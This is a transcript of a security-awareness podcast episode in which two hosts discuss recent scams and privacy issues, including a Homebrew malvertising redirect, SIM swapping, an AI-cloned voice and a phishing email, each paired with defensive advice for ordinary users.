Right, let's talk about interviews really quickly and then we'll get back to some more interesting topics. We obviously, the interview we released a week and a half ago with Amy from the Cyber Escape Room Co. That's a really good interview, really fun interview. If you've ever wondered if a cyber escape room is for you, listen to it and you'll probably decide it is, because that's, I changed my opinion.
But this Thursday, we release these episodes every two weeks, every other Thursday, on the same feed. So if you're listening to this on a podcast or on YouTube, there will be interview episodes in there. This Thursday, we release an episode where I chatted with Sarah Carty from Unboring. They're a marketing agency on a mission to make cybersecurity unboring.
We talk about drama school, cyber espionage, which is quite interesting. But essentially we also talked about how awareness and marketing, we're fighting the same battle, right? We're trying to get people to care and actually engage. So this is, it's good. We talk about how blue, and I realize we use a lot of blue, but how blue and padlocks and hoodies are probably like.
out now. Maybe they still have a place but largely we should stop using hackers in hoodies and padlocks. And we also have a bit of a moan about AI powered as a buzzword and as a phrase. So it's a good conversation. It's about doing things differently, thinking outside the box. So yeah, it's worth listening. That'll be out this Thursday. So keep your eyes peeled wherever you get your podcasts or your YouTubes.
Luke (31:34.766)
Mm.
Luke (31:43.822)
Sounds like a really fun one to watch and useful for standing out.
Anthony Davis (31:45.809)
Yeah, yeah. We've got a few of these in the bag now over the next few weeks. There's there's there's been so many good conversations, like really constructive conversations. really maybe I'm not the best interviewer, but the people and the conversations are around topics that are really relevant and interesting. So it should be good. Should be good.
Right, next tonight, let's get onto some topics. So I've got a few topics that I'm bringing this week and I just wanna show you. I'm gonna just share my screen for a second. So this was something that was shared with me earlier this week. And this is a website called digital.lead. Digital.lead.org.uk. And it's a personal digital safety checklist.
I haven't really played with this, but I thought I'd bring it, because it's a really nice looking dashboard, right? And I thought maybe we'd do a little bit of this together. So at the top of the screen it says, your personal digital safety checklist, your guide to securing your digital life and protecting your privacy. Now let's just bear in mind, if you're a security awareness professional, October is Cybersecurity Awareness Month. And the theme has been the theme for the past couple of years, I think, is Secure Our
World, so this could be a great thing to push for that. So, I'm gonna click on authentication. This is just tick boxes, and there's a lot of words. So at the top it talks about most reported data breaches are caused by the use of weak, stolen passwords, use long, strong, and unique passwords. So here, use a strong password. You can tick the box to say, yep. Don't reuse passwords. You can tick the box and say, yep.
Save your passwords into the browser. Essential.
Anthony Davis (33:44.86)
Okay, avoid sharing passwords. Tick, enable two factor authentication. Tick, keep backup codes safe. Tick.
Anthony Davis (33:55.823)
I have to, let's ignore that one. Brilliant, so that's authentication done. I can't get back. I think I found a flaw in the website. How do I, do I have to tick?
Anthony Davis (34:13.786)
Okay, so I think the web, no, maybe I can go checklist. Okay, slight user experience flaw there.
Luke (34:19.18)
Maybe some tweaks are needed.
Anthony Davis (34:23.056)
So look, maybe there's some flaws on this website, but this could be really good for inspiration. If you don't wanna push this site out itself, you might wanna build your own if you've got a team that are kind of savvy. But this is quite good for inspiration because it gives some nice, there's a chunk, 59 items here. There's 59 secure behaviors here that you can market to your people really easily.
Luke (34:33.123)
Mm.
Anthony Davis (34:52.498)
If I click on email, have more than one email address. Consider using one email address for important accounts and a different address for less important stuff. It's not bad advice, maybe not everyone would do that.
Do not share your primary email publicly. That's kind of hard to do in this day and age with data breaches every week. Yeah. So yeah, look, you might want to have a play with that. We'll put a link in the newsletter. But as an awareness professional, it could be good for inspiration.
Luke (35:14.86)
Yeah.
Luke (35:30.476)
menace and but i isn't topics of secure and his techniques
Anthony Davis (35:34.162)
Yeah, kind of looks like just with a tad bit more polish. It could be, could be awesome.
Luke (35:40.558)
Yeah
Anthony Davis (35:43.507)
Next one I want to talk to you about. I know I said I wasn't going to do a lot of screen shares, I'm really sorry Luke, I know it makes editing a right nightmare. But I'm just going to share this one. This was from Harley Sugarman, who is founder and CEO at Anagram Security. And actually I've had a conversation with Harley, won't be out for a few weeks because there's a bit of a queue, but had a really good conversation for the interview series with Harley.
So that'll be out in a few weeks. I saw this on LinkedIn. Harley came across this pretty clever attack last week through Google Ads targeting dev teams via Homebrew. Sound familiar? The attackers show a legitimate brew.sh URL in the ads, but then quietly redirect to brew with an E, B-R-E-W-E.sh post click. So Google Ads are showing the real
brew.sh URL, then a silent redirect to brewe.sh. It deploys a stealer and it's running about $1,000 a month on dark markets. So this essentially, Harley says, this is exactly why security awareness needs to evolve beyond "check the URL", because modern attacks are exploiting the very platforms and verification systems we're told to trust.
While Cuckoo claims to have addressed this specific incident, please be cautious. Simple but effective defense, direct bookmarks for critical dev tools. Don't trust Google Ads. You can't trust Google Ads. Stay away from Google Ads. I think that's what it boils down to, doesn't it?
Luke (37:22.158)
Mm.
there. It's always seen it plenty of times at the sponsored ads. Always find the actual website or find it somewhere else.
Anthony Davis (37:30.694)
Yeah. Yeah. I.
I mention those domains because those domains are dead now, like the malicious domain is gone. We had that in December. It doesn't seem like it was that long ago. It was really early doors. Luke, you found one, didn't you? Searching for... Google Ads.
Luke (37:53.054)
Google Ads. Yeah, and it obviously showed the real Google Ads domain before I clicked on it, and then clicking on it was a Google site that looked like the Google Ads website. It was quite an impressive one.
Anthony Davis (38:07.366)
Yeah, and the whole reason that was allowed, I can't check it with this one because the website's gone, but the whole reason this was allowed was because it was a Google site. So it sat within google.com, which meant it was like trusted.
Luke (38:16.76)
Yeah.
Luke (38:20.834)
That's crazy. Yeah, very clever.
Anthony Davis (38:22.138)
It's clever, but it's crazy. Yeah. Yeah.
Right, the next thing I wanted to mention, and this is kind of, I was debating whether or not to mention this or not because it's a little bit morbid, but it's, the,
Anthony Davis (38:42.234)
There was a video released this week of... it was footage of the wife of the OceanGate CEO. So you know the Titan submarine that imploded. Do you remember that from... was that last year? Where the custom-built submarine deep, deep down imploded like really, really quickly. There was a search for them and then they found the wreckage. So I saw this on Interesting as F
on Reddit and it's footage of the implosion happening. So they're on board on the ship and they basically take it, there's a bang and they go, what was that bang? And then a command comes through from the submarine. So obviously the sound of the bang traveled faster than the command did. So they've now said that this was the sound generated from the submarine imploding.
Luke (39:34.51)
you
Anthony Davis (39:40.282)
Why am I telling you this? is why am I talking about submarines and imploding and all of that?
Luke (39:44.009)
I was a bit confused if I had spied low sneak peek at the link
Anthony Davis (39:48.043)
Have you? Okay. So I'll just zoom this in. I looked at the comments, the comments themselves straight away didn't give anything. Can I watch the video? But you can see here, if you're watching this on YouTube, you can see here in the right, bottom left hand corner of the video, you can make out there's a little Post-it note on the desk. And someone has,
Luke (40:11.85)
you
Anthony Davis (40:17.188)
zoomed in and maybe done a little bit of clarity on it, and it does say laptop password OceanGate. So the password for the laptop is on a Post-it note, and ultimately, I mean, I don't think they intended for that video to be shared on the internet, but yeah, passwords on Post-its.
Luke (40:36.686)
Mm.
Now see that, obviously we talk about it a lot as awareness professionals, but you see it all the time. TV shows and movies, they like to do that a lot when people are breaking into houses and finding Post-its and those with passwords on them, logging in through them. But obviously it happens and it reminds me of the...
Anthony Davis (40:58.448)
Yeah.
Luke (41:03.084)
Was it the passcode, or was it Kanye West? Was it Kanye West or was it Donald Trump? I can't remember. Probably both of them. Yeah. Zero zero zero zero. No, it's like... this story, it's not even a hard password to remember. I'll write it down. It's crazy.
Anthony Davis (41:07.888)
It was Kanye West in Donald Trump's office. Like six zeros.
Anthony Davis (41:20.932)
No. Like just tell people it's OceanGate. Like you don't need to put it on a Post-it note, surely.
The last one I wanted to tell you about actually happened, so this came from Oli, Oli Inkle, and he sent this to me. A friend of his got a text message from EE, the mobile network, their mobile network. So EE is a mobile provider here in the UK. And it said, hi from EE, please be alert to fraud. As requested,
Luke (41:48.067)
Mm.
Anthony Davis (41:58.269)
we've ordered a replacement eSIM for you which will stop your current SIM from working. If you weren't expecting this, call us straight away on 150, thanks. And this same person received multiple phone calls from an unknown number around the same time. So they contacted EE and they'd been SIM swapped. So it succeeded, a socially engineered help desk.
Luke (42:15.608)
Hmm.
Anthony Davis (42:27.794)
and a SIM swap had taken place. And SIM swaps, you know, that means that any text message, any SMS authentication codes come through to your new SIM, because your number is now on a new SIM in someone else's phone. So this is textbook. This is like what people think is happening at M&S and, you know, all the others, like it's SMS. If your SMS now goes to someone else, they try and log into your account,
Luke (42:44.579)
Yeah.
Anthony Davis (42:57.562)
authentication sends an SMS message, it goes to their phone, not yours. Which is why.
Luke (43:01.634)
Yeah, it's not even just account credentials, a lot of apps and banking do that as well. So yeah, people could just log into your bank account and take all your money. I saw something the other week about some providers where you can lock your SIM or prevent the porting of it.
the Google and they call it a port freeze. I can't, I don't know if it's available to everybody and how straightforward it is to get done but there might be something to look into about looking into getting your number protected.
Anthony Davis (43:45.468)
So I've just googled this and EE themselves. What do they say? So this is a...
Anthony Davis (44:01.354)
So someone says, it appears as if the security threat of SIM jacking is increasing, and one of the recommended ways of protecting against it is to lock your phone number with your service provider. Many network service providers offer port freeze or number lock to protect your mobile number from unauthorized transfer. Once activated, you can't port your number to another line or carrier unless you remove the lock, either with a PIN or by walking into the store. If your carrier allows this feature,
it's an excellent way to beef up your SIM protection. Does EE offer this service? Says someone on EE's community. And EE's community support team come back and say, this is not an option. To be able to port a number to another network, the account holder must pass all of our security measures that are put in place to protect their number. But clearly those security measures aren't working very well. So please don't cut me off, EE, as I am an EE customer.
Luke (44:44.717)
Mm-hmm.
Luke (44:56.462)
Yeah, they're probably very basic. It's probably like your address and your secret answers that are probably not very tricky to answer.
Anthony Davis (45:05.852)
But this is it, right? So if your password gets compromised, password reuse, for example, could be a thing. So first and third characters from your password or something like that. Your address, the date of your bill, all kinds of things. A lot of this data is out there now. It's not difficult to find out someone's address nowadays.
Luke (45:32.714)
No. I'm surprised it's not a standard thing for porting SIM cards having the ability to disable that without physically going to a store to get it done or...
Anthony Davis (45:42.449)
Mm-hmm.
Anthony Davis (45:46.747)
I don't, even if it was a cooling-off period, like, and I guess there's reasons for it, but if I wanted to port my number from one to another, then going to a store wouldn't be much of an inconvenience, but I get how it would for other people. But maybe it could be like, porting a number takes a week, and we'll notify you three times during that, and make it very clear in the messaging what this actually means.
Luke (46:01.816)
Hmm.
Luke (46:10.381)
Yeah.
Anthony Davis (46:14.322)
Because that message that Oli's friend had received, we've ordered a replacement eSIM for you, which will stop your current SIM from working if you weren't expecting this. What that doesn't say is you have requested to transfer your number from your SIM card to another SIM card. Clear. So EE's messaging is really poor on that and that's where it should be improved. That message should say you have requested to transfer your number.
Luke (46:31.968)
Mm, yeah, not very clear.
Anthony Davis (46:43.506)
from your SIM card to another SIM card. If you have not made this request, contact this number. Don't talk about eSIMs and current SIMs, because some people won't know what that means.
Luke (46:46.382)
Mm-hmm.
Luke (46:50.114)
Yeah. No. You'd have thought it'd be possible to just be like, you need to verify this on your current number. Or even like an app. Some providers might have an app and you could enter your code or biometrics to authorize that transfer. These days you think that'd be a thing.
Anthony Davis (47:07.612)
Yeah.
Anthony Davis (47:16.562)
Do you know, when you get, and maybe it needs to get to this level, when you sign, like when you get a new driver's licence, or you get a passport, you have to like scan your identity in an app. There's one I've seen recently called Auth ID and you have to actually take a picture of your documents. You can't provide a previous picture. You have to do it within the app. Maybe they need to do that, because mobile phones are a big deal. They're a gateway to a lot of things. Like we've said,
a phone number can get you into a bank account, medical records, all kinds of things. So maybe they just need to up their game with what that security is, and actually start making sure it isn't just like name of first school, name of first pet, third and fourth character of your password.
Luke (47:52.259)
Mm.
Luke (47:58.37)
new.
Anthony Davis (48:11.634)
I had one last thing I want to talk to you about this week, and this was an article I saw on Fast Company, and this is titled "Gen Z is willing to sell their personal data for just $50 a month". So apparently there's a new app called verb.ai, and what they want to do...
So this article says, to take advantage of the nearly seven hours a day Gen Z spends on their phones, a new app called verb.ai, launched by youth polling company Generation Lab, is now offering to pay young people for their scrolling time. So you install a tracker that monitors what you browse, what you buy and what you stream. And then Verb creates a digital twin. This sounds awful.
Verb creates a digital twin of each user that lives in a central database. And from there, companies and businesses can query the data in a ChatGPT-like interface and get a more accurate picture of consumer preferences than you would get even from a room of Gen Zers.
It just sounds dreadful.
Luke (49:25.55)
Sounds like a Black Mirror episode.
Anthony Davis (49:27.858)
Yeah, in return for their personal data, Verb pays $50 or more per month to the user depending on the activity. So for Gen Zers, it's a fair enough deal for something that they're likely doing anyway. And 88%, apparently 88% of Gen Zers, oh, Gen Zers, I hate that phrase. 88% of Gen Zers, Zeders, Gen Zeders?
88% of Gen Zers report being willing to share some personal data with a social media company, compared to just 67% of older adults, provided that they're fairly compensated, either with cash or a personalised algorithm.
Anthony Davis (50:16.038)
Yeah, it says here though, it's a generation filled with contradictions. Gen Z is at the same time still taking protective measures. They are clearing cookies, using anonymous browsers and encrypting their communications twice as often as other generations. However, they're more likely to agree with the statement "I don't mind being tracked by websites or apps". Look, I think there's a massive task here for everyone in cyber security,
Luke (50:39.982)
Thank
Anthony Davis (50:44.602)
or in cyber security messaging or awareness. If you've got Gen Z, young people, people under the age of 35, 30, whatever it is, you need to make them realise what they're giving up, because it's really easy now, and I've said it on this episode, like everybody's getting breached, you know, like you can't keep this data safe anymore, but you still need to care, don't you? Or at least be aware. You can't just blindly trust that everything's gonna be okay.
Luke (51:08.599)
Yeah.
Anthony Davis (51:14.544)
Maybe it is, I think we've said before, maybe this generation we're talking about aren't the generation typically with mortgages or mouths to feed or stuff like that. And that's more and more increasing, but they need to care because one day they will. And if all their data's out there, they're screwed.
Luke (51:14.86)
Nice.
Luke (51:32.418)
Yeah, it's definitely something to think about and it's probably going to get worse with the future generations. How everything's digital these days and apps like TikTok and all the social media.
Anthony Davis (51:38.929)
Yeah.
Anthony Davis (51:47.911)
Yeah, yeah, it's not been a few weeks ago. We spoke about TikTok getting banned. I guess that's probably coming again soon, isn't it? That had like a 60 day reprieve or something, so that's probably due in the next couple of weeks. We'll probably be talking about that. Yeah. My stories are done, sir, so it's over to you.
Luke (51:58.432)
Yeah, probably.
Luke (52:05.454)
Probably,
Luke (52:13.038)
Cool, yeah, this is something I saw on TikTok. Basically, yeah, if you could pop it up on the screen it'd be great. Yeah, can let it play, but it was about an AI voice controversy with ScotRail in the UK. And yeah, voiceover artist Gayanne Potter has been AI cloned.
Anthony Davis (52:18.62)
to share it.
Luke (52:43.214)
Hopefully we'll play the video just to run that, yeah.
Anthony Davis (52:45.148)
Here we go.
Anthony Davis (54:12.242)
That's interesting, isn't it? This is exactly why there was a big actors' and writers' strike in America last year.
Luke (54:13.688)
Yeah.
Luke (54:19.794)
Yeah, and I thought it was quite a shocking story, I guess, especially, yeah, with how we sort of discussed AI and voice, we've spoken about voices before and people getting it stolen without permission. But in this case, that 2021 contract has come to bite them in the back with probably a clause somewhere that said it was...
going to be used or stored for future use and maybe they didn't read it properly or...
Anthony Davis (54:50.086)
your voice may be used to train AI models or something like that in a small print.
Luke (54:53.1)
Yeah, and here we go, two years later, and the voice is there on ScotRail.
Anthony Davis (55:00.25)
It does make you wonder where it ends. We're talking about her voice, right? Which might not be, like some people might say, it's just a voice. You could hear it walking down the street. She's had no, as a creative, you probably get to choose who you do business with. So yes, it's just ScotRail on this occasion, but that could be someone political or someone, the message could be offensive or
Luke (55:16.11)
Hmm.
Anthony Davis (55:28.562)
it could be of one particular opinion that, you know, she doesn't agree with that a client that she'd never choose to do business with for moral grounds. Yeah, but where does the line stop as well? It's just a voice. Okay, but a voice is okay, but a face isn't. So we see all the stuff about, you know, deep fakes being banned and, you know, deep fakes being used for like revenge stuff and you know.
Luke (55:33.827)
Yeah.
Luke (55:37.742)
That could be really damaging.
Luke (55:51.758)
Hmm.
Luke (55:55.532)
You see it on social media as well now. People, influencers getting deep faked for ads and... that we saw. Yeah.
Anthony Davis (56:01.319)
We had one last week and the week before so it's... yeah.
Luke (56:05.708)
Yeah, the build thing is around the Delores and the League Alley's that aren't really in place because it's still quite new and not really been... That was really set up, determined it.
Anthony Davis (56:17.584)
No, we need some, there hasn't been test cases on all of this yet. That's probably the problem. This, in a way, reminds me, and I don't know where this comes from, but De La Soul's album, 3 Feet High and Rising, wasn't released on digital, it wasn't released on streaming for years, right? Because the contracts at the time didn't even consider that streaming would be a thing. So all of the
Luke (56:25.294)
Yeah.
Luke (56:44.846)
Mm.
Anthony Davis (56:46.394)
rights they had for the samples didn't allow for streaming. They allowed for like CDs and physical media, but they didn't allow for streaming. So it wasn't released for years, and it took them ages to get those permissions to release those just last year on Spotify and Apple Music and stuff. And this is like the opposite of that. It's like, they've probably been so vague in the Ts and Cs, I'm assuming here, if you work for whoever that company was, that they were like legal within use, I'm assuming, right? But
Luke (56:59.822)
Hmm.
Luke (57:11.854)
Mm-hmm.
Anthony Davis (57:14.65)
I would imagine that in some cases, T's and C's are vague enough that they can't be defended. They're like quite wide open. And who reads the T's and C's? This is a problem.
Luke (57:20.493)
Hmm.
Yeah, it reminded me of our YouTube video, the Halloween one we did like this. Yeah, just about not reading T's C's particularly well and it happens a lot where people are, in our sort of world, are downloading and signing up to all sorts of apps and data is going left right centre. Yeah.
Anthony Davis (57:29.702)
That's exactly it.
Anthony Davis (57:40.915)
Look, we knew it was going to happen. We told, we predicted the future. This is exactly it. Yeah, if you're unfamiliar with the video, the video is available on our YouTube, I'll put a link to it in here. It's called Likeness, and we did it for Halloween last year. I sit down at a computer thinking it's going to create a clone of me, it scans my likeness, I don't go ahead because it asks me for money,
Luke (57:46.99)
Yeah.
Anthony Davis (58:07.302)
And then there's a number of scenarios where my likeness is used without my permission. And like even like, all because I didn't read the T's and C's.
Luke (58:12.909)
because you didn't read the T's and C's.
Anthony Davis (58:19.548)
Yeah, amazing.
Anthony Davis (58:25.436)
Can I, just one thing to add on that, and I haven't thought of this before, but maybe ChatGPT solves the Ts and Cs problem, right? Maybe you copy and paste the Ts and Cs into ChatGPT, or an AI of your choice, and you say, what red flags are in these Ts and Cs? What do I need to be aware of? What am I giving away? Maybe you can ask questions like that, and it will tell you, it will read it for you.
Luke (58:48.462)
you
Anthony Davis (58:55.046)
That's a really great use of AI. Like what red flags are in these Ts and Cs? What should I really be aware of? Ask it a question like that. I've never thought of that before, but that might be something. I might have a play with that and bring something next week. You'll never guess what they say in their Ts and Cs.
Luke (59:04.174)
Yeah.
Luke (59:08.514)
Well, for... Yeah.
I mean, for personal use for sure, and then I'm sure for business use there's obviously legal teams that will read it, or paste it into ChatGPT or whatever AI tool and do it for you. But yeah, there's a website as well, wasn't there, that does a Ts and Cs thing.
Anthony Davis (59:31.527)
I was just gonna say, we spoke about this before and I couldn't remember what it was called and I couldn't find it. And literally as we were talking about this, it's come to me. So there is a website called TOSDR.org, TOSDR.org, terms of service didn't read. And you can search for a number of services on here. This website's been around for years. And essentially it tells you,
So Facebook, for example, it gives it a grade. Facebook, it gives a grade E. Facebook stores your data whether you have an account or not. The service can read your private messages. The service can view your browser history. And deleted content is not really deleted. And the service keeps user logs for an unidentified period of time. And you can go into more detail on that. And it literally lists like reds, ambers, greens. So.
TOSDR.org site of the week. You can get security grades of lots of top services. Interestingly, DuckDuckGo, which is the cyber security professional's browser of choice, gets a grade C.
So, yeah.
Luke (01:00:50.506)
really handy website.
Anthony Davis (01:00:52.048)
Yeah, yeah, so check that out to TOSDR.org
Right, last one from you.
Luke (01:01:00.322)
Yeah, just a quick one to share. I use WhatsApp and received a message from the official WhatsApp account this week telling me to increase my account security with a passkey. So it was quite a sort of cool thing, and we've spoken before about TikTok running a 2FA campaign on their official account and stuff like that. But yeah.
This is the interesting thing, that they're sort of pushing passkeys now on it. It just explains, maybe not in the best way, it doesn't really. It says: help protect your account, passkeys add an extra layer of security by using your face, fingerprint or screen lock to log in, head to settings, tap account and then passkeys. And then it gets the side button, which, I mean, I use WhatsApp for web as well and it doesn't go anywhere for web, tells you to go on your phone, which is probably not the best user experience to be honest. It probably could have told me some information.
Anthony Davis (01:01:56.412)
Yeah, I just found that out as well.
Luke (01:01:57.74)
But yeah, I did it on my phone. I use Android and it was pretty quick process. It's a kickstart button. I just clicked that and it basically was like two steps and saved it to my account. And now I use a passkey for WhatsApp. So yeah, no, it's just a cool little feature that they've dropped in there. And you can tell it's from WhatsApp because it's a verified account.
It's like a specific pop-up I guess only for them that says it's official.
Anthony Davis (01:02:29.746)
Can we still trust the blue checkmarks in WhatsApp? I think we can, can't we? There's only Twitter, where you can buy them now.
Luke (01:02:36.31)
Yeah. Yeah.
Anthony Davis (01:02:40.622)
Yeah, it says, I see your screenshot, says, this is an official account of WhatsApp. Learn to click, click to learn more. So, yeah.
Luke (01:02:48.992)
Yeah, that was good to see it on there.
Anthony Davis (01:02:53.68)
Yes, absolutely. There was one last thing, I've just seen your note on this. I am just, as a funny little closer, I got an email that was apparently from Luke, but it wasn't from Luke. I found it in my junk mail. And yeah, let me see if I can, I don't think I can find it, which is a shame.
Luke (01:02:56.758)
and
Luke (01:03:04.524)
Yeah.
Anthony Davis (01:03:23.602)
But yeah, it was, it came from Luke, it came from me, what am I saying? Hang on. I'll find it here. Here it is.
Luke (01:03:36.76)
Was it someone imitating me with a Hotmail or Gmail account, I think, wasn't it?
Anthony Davis (01:03:41.488)
Yeah, here it is.
Anthony Davis (01:03:46.215)
And when I look at it now, it's really obvious that it's not from you. And it's a good job it went in my spam mail. But this is, you ask how, you have to ask how do, like, how do they find this stuff out, right? So it's, the knowledge and the fact that we're connected is clearly out there. So this went to my Risky Creative email address, which is only six or seven months old. And it's secure, two-factor authentication. You know, it's...
pretty much as secure as a Google email account can be. And you can see here: hello Ant, how are you doing? Well, I'm tied up in a conference meeting. I need you to answer a short but urgent task for me. Kindly reply with your personal WhatsApp number and look forward to my text. Kind regards, Luke Pettigrew. And obviously it's not from Luke's email account, it's from a Gmail account, a random Gmail account.
Luke (01:04:43.128)
Yeah.
Anthony Davis (01:04:44.496)
So yeah, that fell in my spam. So it was in my spam folder, but it's got a nice big banner. Well done Google for flashing that big red banner: this message seems dangerous. Similar messages were used to steal people's personal information. The lovely thing about that is Google's obviously read the content and knows that that kind of message is malicious. I'm not sure all mail providers would do that, but Google wins on that one. But yeah.
Luke (01:04:48.942)
You've got a nice big banner in there as well.
Anthony Davis (01:05:13.23)
Someone's obviously gone out there. I mean, it's not hard to find that we're connected. Our names are on the website and stuff like that. We're in the public eye now, Luke. We've put ourselves out there.
Luke (01:05:21.934)
Yeah, thinking about it now, you should have replied to it. Let's see what happens.
Anthony Davis (01:05:28.892)
There's been zero effort to try and make it sound like it's very, very formal, isn't it? I need you to answer a short but urgent time.
Luke (01:05:34.284)
This is probably a template that...
Yeah, it's probably in a bot that just sends it out to everybody. That's funny.
Anthony Davis (01:05:43.922)
Yeah. Yeah.
Anthony Davis (01:05:48.22)
So yes, obviously Luke didn't have an urgent task, because I texted him and said, look at this email I just got from you, because I already had his number and he already had my number, so he doesn't need me to email my personal WhatsApp.
Luke (01:05:55.15)
Yeah, that's the way to do it.
Luke (01:06:01.55)
You
Anthony Davis (01:06:05.498)
Yes, right. Is that it for this week? I think that's it for this week, isn't it? Excellent, right. So, if you're going to Infosec Europe, come and say hi, I'll see you there. Cyber 100 Club, Wednesday. Find out if we've won anything, half past five, Cyber 100 Club. Tell your people not to, I think the takeaway this week is tell your people not to paste stuff into a Run box on Windows.
Luke (01:06:09.102)
I think it is.
Anthony Davis (01:06:34.618)
Windows asks you to press Windows key R. There's your messaging for this week. Never press Windows key R when instructed by a webpage. Yeah. So, Thursday. Go and watch the Crack It interview with Sarah Carty. Join us next week, Monday, to find out who's been breached this week. Because no doubt there'll be a couple more by the next time we talk to you. Luke, see you next week.
Luke (01:06:42.36)
Yeah.
Luke (01:06:57.582)
Yeah.
Yeah, thanks. See you all next week. Bye.
Anthony Davis (01:07:04.275)
See ya.